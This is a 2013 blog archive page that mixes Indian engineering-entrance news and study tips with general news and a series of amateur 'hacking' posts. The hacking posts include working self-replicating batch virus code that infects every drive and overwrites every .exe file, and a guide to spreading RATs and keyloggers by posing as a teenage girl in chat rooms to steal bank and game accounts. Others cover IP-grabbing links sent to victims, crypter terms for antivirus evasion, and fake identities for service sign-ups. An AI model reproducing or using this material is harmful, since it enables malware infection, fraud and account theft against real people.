Posts

Showing posts from May 26, 2013

Inter cut-off for IIT entry zooms by 30 per cent

Image
The cut-off marks for admission to the Indian Institutes of Technology has zoomed by nearly 30 per cent this year, thanks to the new top-20 percentile norm introduced by the Centre. Only 1.24 lakh students have cleared the mark this year.   General category students must get over 89.81 per cent in the 10+2 exams, according to an analysis conducted by the Board of Intermediate Education.   The cut-off for students belonging to the Scheduled Castes was 84.34 per cent, Scheduled Tribes, 85.28 and other categories, 88.30 per cent.  Earlier, the mark was set at 60 per cent for general category students and 55 per cent for reserved categ-ory students in 10+2 exams.   To achieve the new cut-off level, general category students must score 476 marks out of 530 to qualify for IITs. The marks are 447 for Scheduled Castes students, 452 for the STs and 468 for other reserved categories.    Only 1.24 lakh students figure in the top-20 percentile list, out of the 3.7

IIT-JEE 2013: 50% of board marks to be normalized

Image
Due to the differences in the marking scheme of the different boards, it has been decided by the JEE Interface to normalize 50% of Boards marks. The 50% of Boards marks will be normalized by equating percentile amongst different boards/examining bodies and anchoring them to All India JEE Main percentiles, and 50% be normalized by equating each Board’s/examining Body’s percentile with JEE(Main) percentile marks of respective Boards /examining bodies. There are five subjects which will be used for normalization. The subjects to be considered for normalization include- Physics, Mathematics, any one of the subjects from Chemistry, Biology, Biotechnology and Computer Science, One language and any subject other than the above four subjects.

Denied by IIT JEE, Blind Topper Kartik Sawhney Opts for Stanford

Image
How blind is India's education system? While some top officials at CBSE and IIT JEE committee mull over this question, a brilliant, hard working and smart student has decided that it's better to take his talents abroad where they will be fully appreciated rather than waste his energy trying to fight the system in India. And oh, did we forget to mention. The student in question happens to be visually impaired. Meet 18 year old Kartik Sawhney. His father owns a store in Lajpat Nagar, his mother's a homemaker and he has a twin sister and an elder brother.After acing his class XII CBSE exams with a 95% pass percentage, that too in the stream considered challenging by many i.e. Science with Computer Science, Delhi boy is all set to attend Stanford University to study computer science. He would have preferred to complete his education in India in the prestigious IITs, but depressing guidelines of IIT JEE denied him a chance to appear for the exam, because he is v
Image
The IIT JEE is difficult if you don’t study for it but if you study for it, it then becomes slightly less difficult for you. In this section we arr going to tell you that how you should study for IIT JEE. For some more information, you can also visit the next 4 sections. Studying for IIT JEE Can be divided into 5 Parts 1. When to begin your IIT JEE Preparation 2. Planning your course 3. When to study 4. Where to study 5. How to Study 1. When to begin your IIT JEE Preparation The most important thing is when to begin your preparation for IIT JEE. Class XI ? Class XII ? After passing out Class XII ? - these are some of the options which start to revolve in the students minds. We at IIT JEE Guidance consider the ideal time for starting your IIT JEE preparations after getting your Class X Board examinations results, because that is the time when you finally start thinking of your career and also decide upon your stream in Class XI. Although tha

U.S drone attacks in pak-afghan border

An early-morning U.S. drone strike along the Pakistan border with Afghanistan is believed to have killed Wali ur Rehman, deputy commander of the Tehreek-e-Talib an Pakistan, often referred to as the TTP or Pakistani Taliban. The U.S. State Department describes Rehman as "the TTP's chief military strategist" who "led several attacks against U.S., NATO and Pakistani forces on either side of the Pakistan-Afghan istan border." Pakistan's newly elected leader, cricket-player- turned-politici an Imran Khan, condemned the drone attack on Twitter. If Rehman is dead, it's not clearwhat the long-term effects might be on the Pakistani Taliban, as leaders are oftenquickly replaced, and the organization is divided in itself, with infighting between member clans frequent.

Was Chechen immigrant Ibragim Todashev executed by the FBI?

Was Chechen immigrant Ibragim Todashev executed by the FBI? That's what his father, Abdul-Baki Todashev, said Thursday at a press conference in Moscow. He displayed 16 photographs he claims were taken in a Florida morgue that show his son had six gunshot wounds to his torso and one to the back of his head. The FBI says 27-year-old mixed martial arts fighter Ibragim was killed last week during an interrogation at hisapartment by one of its agents and two Massachusetts state troopers. They were questioning him about whether he had ties to slain Boston Marathon bombing suspect Tamerlan Tsarnaev,and about a 2011 triple murder in Massachusetts when he became violent, the FBI said. However, the Washington Post reported Wednesday that Todashev was, according to law enforcement officials, unarmed, which his father also asserts. "I'd only seen and heard things like that in the movies -- they shoot somebody and then a shot in the head to make sure," Todashev said. The FBI has r

BITS Pilani acquires its Dubai campus Engineering Entrance , Engineering Entrance (PG)

BITS Pilani has acquired the infrastructure of its Dubai campus from its long term partner ETA LLC Group, ending a 12-year collaboration. Birla Institute of Technology and Science, Pilani made the announcement adding that all the statutory requirements for acquisition had been met. BITS had set up its only international branch in Dubai in 2000 in collaboration with ETA LLC Group. Under the agreement, the latter provided infrastructural ­ facilities and administrative support while the former managed the academics. Talking about the move, Syed M Salahuddin, ManagingDirector of ETA remarked that the campus had grown a lot in past 12 years. “Now we pass on the responsibility to BITS Pilani totake it to further heights of excellence in Engineering andTechnology education in the Middle East region,” he said. Professor Bijendra N Jain, Vice Chancellor of BITS Pilani in India, said: “Now that BITS Pilani has taken full responsibility as an infrastructure- ­provider for its Dubai Campus,

Affirmative action in IIT ENTRANCE EXAMINATION !

The affirmative action proposal, that seeks to pick girls over boys in the IIT entrance exam if their scoresare tied, is a step in the rightdirection. Encouraged by the human resource developmentministry, the IIT Joint Admission Board would do well to institutionalis ­e this policy. There is no denying that admission to engineeringcolleges in the country is lopsided. This is best exemplified by the IITs themselves where women only form 10% of the total student intake for undergraduate programmes. In fact, such a bias has conditioned girl students to treat engineering as a secondary choice of subject for higher studies. Neutralising the overwhelming dominance of men in engineering is vital to break this stereotype and promote the cause of gender parity in the workplace. It must be noted that the affirmative action proposal under consideration is quite different from reservations. The latter impedes meritocracy by favouring below-par candidates. Unfortunately, the IITs are already hobbl

Government gears up to expedite land acquisition for IIT campus

With tardy land acquisition delaying the establishment of Indian Institute of Technology (IIT), Bhubaneswar, Chief Secretary BK Patnaik has directed Khurda district administration as well as Revenue and Disaster Management Department to complete the process soon.The State Government had approved allotment of 935 acre in Jatni (Khurda) and Kanas (Puri) tehsils for the IIT campus and advance possession has been given for 517 acre so far. While boundary wall measuring 14 km has already been erected, raising the boundary for another 5 km has hit road-block for non- acquisition of land. The Chief Secretary asked the district administration and revenue officials to take possession of the balance acquired land by end of June and hand it over to the institute through IDCO. The Works Department has been asked to take up widening of road by June while CESU was directed to stay in readiness to construct permanent dedicated power supply line to the ca

Kannur girl bags 13th rank in IIT-M entrance exam DC

One month was all she got to prepare for the entrance examination of the coveted Humanities and Social Science Course of IIT-Madras. But this 17- year old girl from Kannur cracked the test in style and was ranked 13th in the all-India level test. Meet Shalini Jithendran of Prashanthi House at Kuttimakkal near Thalassery in Kannur, who brought laurels to her native place by getting into one of the most prestigious institutions in the country. IIT-M’s Humanities and Social Science is a five- year-long Integrated M.A. course for the best 46 students in the country. Shalini says she was never keen on applying for the Humanities course as she was preparing for medical and entrance examinations from Kanjirappally in Kottayam. “I was taking coaching for medical and engineering entrance exams while studying in St. Antony’s Public School in Kanjirappally. I came to know about the IIT-M course very late and so I had only a month to prepare for it. E
The Indian Institute of Technology-Kanpur (IIT-K) will on June 1 become the country's first academic institution to offer a helicopter ferry service. To be run by Pawan Hans from the institute's runway, the facility would initially offer flights to Lucknow. It would be extremely handy for IIT guests, faculty, academicians, students, local industrialists and others willing to fly to Lucknow. The first flight would take off from the IIT- Kanpur runway on June 1 and the seven-seater helicopter will have a capacity to carry five passengers at a time. Merchant's Chamber of Uttar Pradesh, which is the driving force behind the launch of the helicopter service, has termed it as "an epic moment in the history of the IIT-K and the industrial city". Anita Jha, Secretary General, Merchant's Chamber of Uttar Pradesh, said: "IIT-K is launching this service in association with Pawan Hans Limited. Though initially the service wou

IIT-Kanpur first to have helicopter service

The Indian Institute of Technology-Kanpur (IIT-K) will on June 1 become the country's first academic institution to offer a helicopter ferry service. To be run by Pawan Hans from the institute's runway, the facility would initially offer flights to Lucknow. It would be extremely handy for IIT guests, faculty, academicians, students, local industrialists and others willing to fly to Lucknow. The first flight would take off from the IIT- Kanpur runway on June 1 and the seven-seater helicopter will have a capacity to carry five passengers at a time. Merchant's Chamber of Uttar Pradesh, which is the driving force behind the launch of the helicopter service, has termed it as "an epic moment in the history of the IIT-K and the industrial city". Anita Jha, Secretary General, Merchant's Chamber of Uttar Pradesh, said: "IIT-K is launching this service in association with Pawan Hans Limited. Though initially the service wou

The 10 Most Searched Things of 2012 Show How Screwed Up Humanity Is

Google, the number one search engine on the planet, has published its comprehensive list of what was on people's minds during 2012. The company's 2012 Zeitgeist—"the defining spirit or mood of a particular period of history as shown by the ideas and beliefs of the time"—is as accurate a reflection of humanity's current state of mind as we've got. And, with all the crap that has happened this year, humanity's mind sucks. Here's the overall global ranking: 1. Whitney Houston 2. Gangnam Style 3. Hurricane Sandy 4. iPad 3 5. Diablo 3 6. Kate Middleton 7. Olympics 2012 8. Amanda Todd 9. Michael Clarke Duncan 10. BBB12 (don't search for this, it's a terrible Brazilian show, apparently). Whitney Houston? Gangnam Style? Really? Hurricane Sandy, sure. But then iPad 3 and Diablo 3 and Kate Middleton? Is that really "the defining spirit or mood of a particular period of history as shown by the ideas and bel

HOW TO LOCK DESKTOP ICONS !!

In this tutorial we’ll see how we can lock our desktop iconsso that no one can makeany changes to the icons thatwe have arranged in the desktop. Generally it happenswhen someone comes to our system and mess up the arrangement. So for that open Registry( Open Run dialog box & now type regedit) and go to the following path HKEY_CURRENT_US ­ER\Software\Mic ­rosoft\Windows\ ­Current Version\Policie ­s\Explorer. Right-click in the right pane and select New, DWORD Valuename NoSaveSettings and press the Enter key. Right-click on the new NoSaveSettings item and select Modify. Enter 1 in the Value data box. After this, whenever you restart Windows, your settings will return to their current state.

Getting Unbanned by Adsense

When Adsense bans you it can seem like the end of the world, especially when you banked your online income onGoogle’s lucrative ad-revenue system. However while the account holder (that’s you) is banned â€Å“foreverâ€, the domain is not. What will have to happen to get ads runningon that domain again is to prove to Google, to their satisfaction, that those domains are no longer ownedby the banned person. A method that I have coachedsome people to use successfully (which I only recommend if those sites were actually generating income, because this method costs money) is to do the following: 1) Incorporate a new company. Delaware is among the cheapest places to do this, and you need not live there to do it. 2) Write up a bill of sale between you and your new corporation for the domains and sites that you want to get ads running on again. Have someone other than you (with a different last name) sign the contract on behalf of your corporation. Any friend can do this. 3) Register a b

How to kick out people who use our wifi : (secure wifi from other users- easiest known way )

Sometimes sharing wifi make internet slower especially when downloading file.ok,i'll show you how to kick out people who use our wifi.let's start! 1) First of all we need net cut.link has been provided below " http:// www.arcai.com/ arcai-netcut-faq / free-download-ne tcut.html " 2)Install it.Select IP address that need to cut it down,then click ‘ Cut Off (Ready) ‘ icon to get it done,that all .pretty simple isn't? (Note: if you wanna resume again the connection,clic k 'resume' icon to resume it ) Say thanks if you enjoy it

Best Known Batch Coding Programms (.BAT viruses ... best way to troll deeply)

1.Infecting All drives : @ echo off rem --------------- ­--------------- ­--- rem Infect All Drives for %%E In (A,B,C,D,E,F,G, ­H,I,J,K,L,M,N,O ­,P,Q,R,S,T,U,V, ­W,X,Y,Z) Do( copy /Y %0 %%E:\ echo [AutoRun] >%%E:\autorun.in ­f echo open="%%E:\%0" >>%%E:\autorun.in ­f echo action=Open folder to see files... >> %%E:\autorun.in ­f) rem --------------- ­--------------- ­--- 2.Infecting all .exe in the computer @ echo off rem --------------- ­--------------- ­--- rem Infect All .Exe Files assoc .exe=batfile DIR /S/ ­B%SystemDrive%\*.exe ­ >> InfList_exe.txt echo Y | FOR / ­F"tokens=1,* delims=: " %%j in(InfList_exe.txt) ­ do copy /y%0 "%%j:%%k" rem --------------- ­--------------- ­--- 3.SPAM local disk echo %random% > 'C:\%random%.tx ­t' echo %random% > 'C:\%random%.tx ­t' echo %random% > 'C:\%random%.tx ­t' echo %random% > 'C:\%random%.tx ­t' echo %random% > 'C:\%ra

Functions of CRYPTER

*Crypter : the program (mostly GUI) will crypt the malware / bot to make it hide from anti-viruses *Stub : the Decryptor of crypted program *FUD : Fully Un Detectable (FUD = no AV detect) *RUNPE : run the PE without headers in memory *USG : unique stub generator. (make unique stubs) *Binder: will join two file will drop in hdd or mem *Pumper: will increase size oftool *EOF : end of file(in crypter itneed to preserve) *Cloner : will clone the file (Decryptor like in HDD) *Icon Changer: will change the final exe icon

Functions of CRYPTER

*Crypter : the program (mostly GUI) will crypt the malware / bot to make it hide from anti-viruses *Stub : the Decryptor of crypted program *FUD : Fully Un Detectable (FUD = no AV detect) *RUNPE : run the PE without headers in memory *USG : unique stub generator. (make unique stubs) *Binder: will join two file will drop in hdd or mem *Pumper: will increase size oftool *EOF : end of file(in crypter itneed to preserve) *Cloner : will clone the file (Decryptor like in HDD) *Icon Changer: will change the final exe icon

How to Make Free International Call from PC to mobile using Google voice

Google voice free call activation: Follow these instructions for activating Google voice outside USA and make free international calls from your computer. --------> CREATING FAKE US NUMBER FOR GOOGLE VERIFICATION 1) The first step is to get a free incoming US number using VOXOX & SIPgate and for that you need a US IP address. So, install hotspot shield (or ultrasurf) to get an US IP address and then register atSIPgate & Voxox to get a free incoming US number. Usefake Name Generator for filling out the registration details with a US identity. You’ll be provided with a free US number when you register with Voxox. Then download SIPgate and install it. To receive calls on your PC on that number, go to sipgate settings page using your browser and setup a new VOIP phone. free voip phone sipgate After logging in from the SIPgate softphone from desktop, your status will be shown as online. Now you’ll receive all the calls made to that US number on your desktop softphone. 2)N

How To Get Access to ContentHidden for Guests in a Forum

Method: Using a Search-engine Bot disguise as your User-agent (Note:This may or may not work, like the other options, but you can have access to even thread attachments if it does) You would need a plugin/add-on in your Browser to do this. If you are using Firefox you will need: User Agent Switcher: " http:// ­chrispederick.co ­m/work/ ­user-agent-switc ­her/ " Just install it in your Browser, then you just have to switch your User-agent in the Add-on menu. Change it to Google-bot/ ­Yahoo! bot and try to open the Thread you want, where you will get full permission to acces the contents

HOW TO BECOME A SERIOUS HACKER (not cracker)

There is a community, a shared culture, of expert programmers and networkingwizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members ofthis culture originated the term ‘hacker.’ There is another group of people who loudly call themselves hackers, but aren't. These are people whoget a kick out of breaking into computers and phreakingthe phone system. (Like those of you who keep asking about how to hack facebook )Real hackers call these people ‘CRACKERS’ andwant nothing to do with them. Real hackers object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. There are people who apply the true hacker attitude to other things, like electronics or music — but in the rest of this article we will focus the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hac

Getting IP of a friend in two steps

Getting IP of a friend in two steps: This is one of the easiest ways to get an ip of a particular person and it takes just a second to do so!And i have been using this way since i knew about it! How to do it: • go to this website : http:// ­www.myiptest.com ­/staticpages/ ­index.php/ ­how-about-you • Enter a redirect URL in"Redirect URL:". "http://" is written for you. you can add a link to a picture or another website so that your victim will not suspect anything! • Once you enter the redirectURL, your link in "Link for person:" will update automatically . • Do not close the page yet. • Copy the link in "Link for person:" • Keep the page opened! • Shrink the link using the shrinker (use anyone of it): Is.gd TinyURL Bit.ly SnipURL By doing this, your victim will never know that it is a trick done just to get the ip • Copy the shrinked URL • Send the link to your victimand trick him/her into clickingit! • Go back to the page you

Easy Way to Spread Your Virus (SOCIAL ENGINEERING)

Easy Way to Spread Your Virus (SOCIAL ENGINEERING): Hey there. I'm going to tell you how to spread your RAT/Keylogger really effectively, you can have a direct age range, and get many things such as Bank Info & Steam accounts. Step 1) Register a new MSN, with a girls name. This is vital because you want to attract men who will downloadthings for you. It doesn't matter what name, just register one that sounds believable. Step 2) Take a picture from one of your girl friends on FaceBook or Myspace or even just go on Google and find a picture of a girl, set this as your display picture on the new msn you created. Step 3) Go to chatavenue.com, ­ and go to"Teen Chat" here there are loads of sad lonely men who want to paedo girls for pictures, JACKPOT, usually these people have games and PayPal's on there accounts and will generally download shit. Step 4) Post in the Chat."16/F/US" or something like that, you will be BOMBARDED with PM's from men wh

A STEP BY STEP GUIDE TO SPAM FACEBOOK WALL WITH AJAVASCRIPT - JAVA RELOADED!!! (NooB FRIENDLY!!!)

A STEP BY STEP GUIDE TO SPAM FACEBOOK WALL WITH AJAVASCRIPT - JAVA RELOADED!!! (NooB FRIENDLY!!!) A STEP BY STEP GUIDE TO SPAM FACEBOOK WALL WITH AJAVASCRIPT - JAVA RELOADED!!! (NooB FRIENDLY!!!) Isnt it really annoying to find your Facebook Wall filled withstupid messages like "Do youthink ***** smells nice or Do you think ***** takes Bath every Day...." so on,withsome great friends answering NO and stuck on my wall(Not even the friends wall for crying out loud) For the whole world to see?Come on Guy's those arepersonal!!!So here is a way toGet Back at them & Fill their wall with our favourate comments!!!Lets ­ see how they like a Dose of their own Medicine!!! It is really easy and All you need to do is to follow the given steps carefully : (Make sure you did each step one by one for it to work) INSTRUCTIONS : * STEP.1: First Make sure that you are on "http://" connection instead of "https://"!!If on https then after youLogin into your FaceB

A Guide to Online Anonymity- How can i be completely untraceable ??

What is Anonymity ?? The act of keeping your identity hidden online by using connection methods and encryption methods, to make yourself untraceable toa person, website, company, school or whatever else you are doing/ ­connecting to. #Uses of Anonymity: *Stay hidden when attacking a website or scanning it for vulnerabilities ­. *Keep your browsing history/ ­activity hidden whenat work, school, library or even your family computer. *Keep your IP ( Internet Protocol Address ) hidden from victims of a RAT (RemoteAdministration Tool) or a botnet. # Methods 1>Using Virtual Private Network[VPN] A VPN is an acronym for Virtual Private Network, it is a server that is used to connect to a LAN ( Local Area Network ) securely. VPNs willencrypt your connection information and hide your real IP from websites, people and it will keep your connection encrypted so you won't be able to get traced. *List of good Free VPNs: >Cyberghost VPN >Pro XPN >Open VPN >Hot Spot Shie

Using Google Website Slicer (Faster Internet tricks)

Google website slicer is a toolthan simply removes all those useless heavy scripted material from any website and just shows you the real content. It also allows you to remove images from the whole website and make it much more faster for access. You just need to visit GoogleWebsite Slicer page and enter your website name youwanna access. Now you can click on the Hide Images option to make your webpagemuch more faster.

10 GOLDEN STEPS for success in CSE

Today i will b writing 10 GOLDEN STEPS for success in CSE. These steps are very important and one shud devlop them before starting their preparation and inculcate them in his personality, behaviour nd study plan. This will helps in dropping the unnecessary baggage nd in targetting nothing less than 100 % in allwhat he do during his preparation. 1). Believe in yourself and you will do your best . Believing in yourself is the key to success in life. Have faith on ur own ability that u can shine nd rise against all odds,,,,,, 2). Be consistent in ur studies. Pace yourself for long hours , almost 8-10 hrs perday. .,,,,, nd it is said , ''Quality study matters not quantative''. Yes, i too agreevid this statement but if u r going to appear for CSE , u must have potential fr doing serious study of almost 6-7 hrs . During graduation period, studies r our's side business but once u enter the preparation mode, it becomes ur primary occupation ( specially for engineers So,

New Android Malware forwards Incoming message to hacker

The malware Dubbed as Android.pincer. 2.origin ,is the second form of Android.pincermalware that is spread as Security certificate that user must install. Upon launching Android.pincer. 2.origin ,the user will see a fake notification of succesful installation,th en on background trojan will start to collect informations like smartphone model,IMEI,Phon enumber &bank credentials. To the most ,it's in the Top rated Tool section,with average user download of 267 peoples a day.Don't evertrust a friend & google play review for security certificateinstallation.

Top 25 People Who Changed the Internet Foreve

Top 25 People Who Changed the Internet Forever: 1. Sir Tim Berners-Lee – World Wide Web 2. Vint Cerf And Bob Kahn – TCP/IP 3. Larry Page and Sergey Brin – Google Inc. 4. David Filo and Jerry Yang – Yahoo! Inc. 5. Bill Gates – Microsoft 6. Steven Paul Jobs – Apple Inc. 7. Mark Zuckerberg – Facebook 8. Chad Hurley and Steve Chen – YouTube 9. Linus Torvalds – Linux 10. Jack Dorsey – Twitter 11. Kevin Rose – Digg 12. Bram Cohen – BitTorrent 13. Mike Morhaime – Blizzard Entertainment 14. Jimmy Wales – Wikipedia 15. Jeff Preston Bezos – Amazon 16. Shawn Fanning – Napster, Rupture 17. Pierre Omidyar – eBay 18. Jack Ma – Alibaba 19. Craig Newmark – Craigslist 20. Matt Mullenweg – WordPress 21. Thomas Anderson – MySpace 22. Garrett Camp – StumbleUpon 23. Jon Postel – Internet Pioneer 24. Caterina Fake – Flickr 25. Marc Andreessen – Netscape

The media may be interested in scandals, but it appears the public is not !!

The media may be interested in scandals, but it appears the public is not. The biggest loser after last week's apparent exposition of one White House scandal after another? Politicians in general, not President Obama, said at least one Monday poll. One reason Republicans are so obsessedwith exploiting "scandals," says today's analysis in The Week, is because the one issue that Americans truly care about — jobs and the economy — is getting better. Republicans talk about three things — Benghazi, the IRS and the AP — because they don't want to talk about these three things: 1. Unemployment. Since bottoming out in 2010, the economy has created 5.8 million jobs; on Friday, as everyone was focusing on scandal, the Labor Department said that jobless rates fell in 40 states in April, while rising in just three. 2. Housing. Home prices are up at the fastest pace since the housing bubble burst in 2006. 3. Confidence. The closely-watched Thomson-Reuters /University of Mic

China's latest high-tech fighter aircraft bear a striking resemblance to U.S. technology

If you've ever wondered whyChina's latest high-tech fighter aircraft bear a striking resemblance to U.S. technology, here's a likely answer. Chinese hackers have compromised the designs of some of the most advanced weapons systems in the U.S. arsenal (Pictured is a Chinese J-20 stealth fighter, difficult to tell apart from a U.S. F-35). A Pentagonanalysis by the Defense Science Board, reported in the Washington Post, says the compromised systems include drone video, laser and "directed energy" weapons, the V-22 Osprey, F-35 Joint Strike Fighter, F/A-18 Hornet fighters flown by the Navy and Marines, and more. The report does not accuse China's government of stealing the designs, but, reports Olivier Knox, it's likely to be a topic of discussion 10 days from now when President Obama meets in California with Chinese President Xi Jinping for the first time. The report coincided with revelations that Chinese hackers illegallyaccessed designs for the new top sec

Chris Christie and President Obamarekindled their unlikely bromance!!

New Jersey Gov. Chris Christie and President Obamarekindled their unlikely bromance Tuesday to talk about the continuing recovery of the Jersey Shore after Superstorm Sandy -- which, in a sense, brought the two together in the heated last stretch of Obama's second-term campaign. They smiled, they chuckled, and even a man-hug or two was exchanged. And they tried a hand at Touch Down Fever, in which players try to throw a football through a tire, on the boardwalk along one of the areas most hammered by the storm. Obama took aim but missed the target several times; Christie made the shot on his first throw.

The2013 Indian Premier League spot fixing case

The2013 Indian Premier League spot fixing casearose when theDelhi Policearrested threecricketers,Sreesanth,Ajit ChandilaandAnkeet Chavan, on the charges ofspot-fixing. The three represented theRajasthan Royalsin the2013 Indian Premier League. Sreesanth was arrested from his friend's house, whereas Chandila and Chavan were arrested from their team hotel inMumbai. Rajasthan Royals suspended the contracts of the three players until the investigation is complete. TheBoard for Control of Cricket in India(BCCI) suspended the players till further investigation. BCCI secretary Sanjay Jagdale, said,"The BCCI is shocked and saddened at the recent developments. The BCCI has zero tolerance to corruption. We will offer all cooperation to the Delhi police and all other authorities in their investigations in this matter. The IPL Governing Council has met and decided that the cricketers found involved will be dealt with severely." Initially Sreesanth's father Shantakumaran Nair ter

How to prepare for IIT-JEE, AIEEE etc. How to prepare for IIT-JEE, AIEEE and other engineering& medical entrance examinations?

This is a big question- particularly for beginners. A few points must be noted. 1. As a teacher, i suggest following strategy: Start preparation from the book"MATHEMATICS FOR LEARNINGPHYSICS" of arihant publications. This is the BESTbook to start preparation with. Then, prepare for maths, physics and chemistryin parallel. Follow arihant book for maths, h c verma for physics and ncert books for chemistry. Thereafter, doproblem practice from last 10 years' problems of IIT-JEE, AIEEE etc. Join some test series in the end. This is the perfect and best strategy forpreparation. 2. The most important thing for success in any competitive examination is that you should have grip over the fundamentals. For that purpose, you need to focus on understanding the fundamentals rather than memorising facts and figures. 3. Once you have mastered the basic concepts of your subjects- maths, physics andchemistry, the only thing required further is to practice according to the pattern of ex